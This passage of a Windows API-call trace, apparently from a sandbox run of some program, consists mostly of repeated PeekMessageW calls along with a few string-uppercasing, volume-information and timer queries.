| out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.089] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87f7b4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f7b4) returned 0 [0155.090] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.090] CharUpperBuffW (in: lpsz="TRUE_HOMEDRIVE", cchLength=0xe | out: lpsz="TRUE_HOMEDRIVE") returned 0xe [0155.090] PeekMessageW (in: lpMsg=0x87f67c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f67c) returned 0 [0155.093] PeekMessageW (in: lpMsg=0x87f67c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f67c) returned 0 [0155.093] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x86f954, nVolumeNameSize=0x7fff, lpVolumeSerialNumber=0x87f964, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x87f964*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0155.094] GetLastError () returned 0x2 [0155.094] SetLastError (dwErrCode=0x2) [0155.094] GetLastError () returned 0x2 [0155.094] SetLastError (dwErrCode=0x2) [0155.094] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.094] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.094] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.095] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.107] QueryPerformanceFrequency (in: lpFrequency=0x87f924 | out: lpFrequency=0x87f924*=100000000) returned 1 [0155.107] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0155.107] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.107] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.108] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.109] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.110] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.114] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 [0155.115] PeekMessageW (in: lpMsg=0x87f89c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f89c) returned 0 